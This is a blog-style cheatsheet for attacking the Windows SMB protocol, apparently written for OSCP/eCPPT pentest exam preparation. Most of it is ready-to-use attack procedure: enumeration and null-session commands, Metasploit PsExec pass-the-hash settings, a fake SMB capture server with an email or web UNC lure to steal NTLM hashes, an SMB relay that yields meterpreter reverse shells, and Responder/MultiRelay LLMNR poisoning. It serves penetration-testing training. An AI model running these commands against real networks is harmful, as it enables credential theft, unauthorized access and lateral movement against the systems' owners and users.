Attacking SMB

This article is mostly a cheatsheet for attacking the SMB protocol. It should be useful for taking the OSCP/eCPPT exam or during engagements.

There are so many tools that are useful for attacking SMB that it's worth organizing them.

What is SMB

The purpose of SMB is to facilitate the sharing of resources over the network: files/folders/disks/printers.

Enumeration

Here are some handy enumeration commands:

1. smbclient -L <IP Address> - List all the shares
2. smbclient \\\\<IP Address>\\<Share Name> - Connect to a share
3. enum4linux <IP Address> - Script gathering a wealth of information from the SMB protocol:
   • Information about the host: workgroup/domain/OS
   • Users
   • Shares
4. mount -t cifs \\\\<IP Address>\\<Share Name> /mnt/<Share Name> - Mounting a share to the local file system
5. Nmap NSE Scripts:
   • nmap -sT –sU -sV <IP Address> -p135,137,138,139,445 --open - Check if SMB is running
   • nmap --script smb-enum-shares <IP Address> - Enumerate shares
   • nmap --script smb-check-vulns <IP Address> - Check for common SMB Vulnerabilities
   • nmap --script smb-os-discovery <IP Address> -p 445 - Information about the OS gathered from SMB
6. Metasploit Modules:
   • use auxiliary/scanner/smb/smb_login - Brute force authentication
   • use auxiliary/scanner/smb/smb_enumshares - Enumerate shares
7. smbmap -H <IP Address> - Enumerate shares (offers a bunch of other functionalities like searching in files, uploading/downloading)

Null Sessions

If a system is vulnerable to Null Sessions, then a user can connect without providing a username and password.

Here's how to list the shares of a system that allows null sessions:

smbclient -L //<IP Address>/ -U '' -N

Here's an example of using the smbclient command to connect to a share and listing its contents taking advantage of a Null Session vulnerability:

$smbclient  \\\\<IP Address>\\Backups
Enter WORKGROUP\htb-xxx password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 10:02:11 2019
  ..                                  D        0  Tue Apr 16 10:02:11 2019
  note.txt                           AR      116  Tue Apr 16 10:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 12:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 12:44:02 2019

        7735807 blocks of size 4096. 2764397 blocks available
smb: \>

PsExec & Pass the Hash

PsExec was originally created as a Windows system administration tool. It is commonly used by pentesters as a method of executing commands on remote machines. PsExec can't be used under any conditions though. Here's what it needs in order to work:

• Have SMB Running (ports 139 or 445).
• Username with Password or NTLM hash of the password (PsExec implementations can take advantage of the Pass-The-Hash method).
• The ADMIN$ share must be available. The user we authenticate as must have permissions to access the ADMIN$ share.

Here are some Metasploit modules related to PsExec:

• exploit/windows/smb/psexec - Obtain a shell on a vulnerable host
• exploit/windows/local/current_user_psexec - Local exploit for local administrator machine with goal to obtain session on domain controller
• auxiliary/admin/smb/psexec_command - Run single commands on a host without uploading payloads that can be detected
• auxiliary/scanner/smb/psexec_loggedin_users - Get the current logged in users via PsExec

Pass the Hash is a technique for connecting to a Windows machine using the username and the password hash (LM / NTLM) rather than the actual password.

Let's suppose we obtained access to a machine. We dumped the hashes. We can use those to get access to more machines using these hashes because usually the users have the same passwords for all the machines inside a network.

msf exploit(psexec) > set SMBPASS 
hashhashhashhashhashhashhashhash:hashhashhashhashhashhashhashhash 
SMBPASS => hashhashhashhashhashhashhashhash:hashhashhashhashhashhashhashhash
msfexploit(psexec) > set SMBUSER john
SMBUSER => john
msfexploit(psexec) > set RHOST 192.168.10.10
RHOST => 192.168.10.10
msfexploit(psexec) > exploit

Snatching & Cracking NTLM Hashes

NTLM = NT LAN Manager = Authentication protocol between Windows clients/servers

The authentication process follows these steps:

1. NEGOTIATION - client sends its username
2. CHALLENGE - The server generates a challenge
3. AUTHENTICATION - Clients encrypts the challenge with its password (its hash rather) and sends it to the server

Historically, the autentication step has been iterated over the years due to a lack of security. There have been several strategies of hashing and sending the password to the server:

1. LM
2. NTLM
3. NTLMv2
4. Kerberos

Note: Windows OSs can still store LM hashes

We can attack this authentication mechanism by impersonating the server. We can either:

1. Trick a client to connect to our fake server
2. Become MitM and sniff the client response (see SMB Relay Attack)

Let's become a fake server and wait for people to connect to us. For this we can use the Metasploit auxiliary/server/capture/smb module:

msf6 auxiliary(server/capture/smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte server challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in John format
   SRVHOST     0.0.0.0           yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     445               yes       The local port to listen on.


Auxiliary action:

   Name     Description
   ----     -----------
   Capture  Run SMB capture server

Since we can choose any challenge, it's customary to use the 1122334455667788 value. Using a fixed value makes hach cracking process easier. Also notice the JOHNPWFILE parameter; a file to store the hashes to and crack them using john later.

In order to have the victim connect to us, we can send and email or direct them to a webpage containing an UNC to our server: <img src="\\<Server IP Address>\ADMIN$">.

We can try cracking the hashes using john using this command: john --format=netlm hashfile.txt.

There are other ways to crack these hashes, for examples using rainbow tables.

SMB Relay Attack

SMB Relay attack is somewhat similar to the previous NTLM hash snatch technique. For this attack, we will become the MitM. Let's see how the authentication process works in this scenario:

1. NEGOTIATION - CLIENT issues a request to the ATTACKER. The ATTACKER issues a request to the SERVER
2. CHALLENGE - The SERVER generates a challenge and passes it to the ATTACKER who then passes it back to the CLIENT
3. AUTHENTICATION - The CLIENT encrypts the challenge and sends it back to the ATTACKER, who sends it to the SERVER, authenticating him as CLIENT

For mounting this attack we can use the Metasploit exploit/windows/smb/smb_relay module:

msf6 auxiliary(server/capture/smb) > use exploit/windows/smb/smb_relay
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/smb_relay) > show options

Module options (exploit/windows/smb/smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SHARE    ADMIN$           yes       The share to connect to
   SMBHOST                   no        The target SMB server (leave empty for originating system)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  445              yes       The local port to listen on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.9.1       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

As soon as clients start trying to authenticate with the Attacker, we will get metasploit sessions created.

Note: The attack won't work with NTLMv2 hashes because they are specific to each machine and can't be reused.

Responder.py and LLMNR Poisoning

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback protocols used for resolution of hostnames inside a network when the DNS protocol fails.

LLMNR/NBT-NS spoofing/poisoning is a method of capturing NTLMv1, NTLMv2 and LM hashes via a MitM type attack.

Falling back on LLMNR/NBT-NS implies broadcasting NTLMv1/NTLMv2 hashes over the network. We will intercept these hashes and either:

1. Relay the hashes to other systems
2. Crack the hashes

Reponder.py is a LLMNR/NBT-NS/mDNS poisoner. It can be helpful with both intercepting and relaying the hashes.

In order for the attack to work, SMB Signing must be disabled on the machines we are exploiting.

We can fingerprint a machine like this:

python RunFinger.py -i <IP Address> 

For intercepting the hashes we need to run:

python Responder.py -I eth0 -rdwv --lm

For relaying the hashes we can run:

python MultiRelay.py -t <IP Address>  –u ALL

A successful relay will result in an upgraded shell where we can run other tools (scanning, mimikatz, pivoting, etc ...) or other plain cmd commands.

Resources

• https://www.contextis.com/en/blog/lateral-movement-a-deep-look-into-psexec
• https://www.rapid7.com/blog/post/2013/03/09/psexec-demystified/
• https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
• https://www.ired.team/offensive-security/lateral-movement/lateral-movement-with-psexec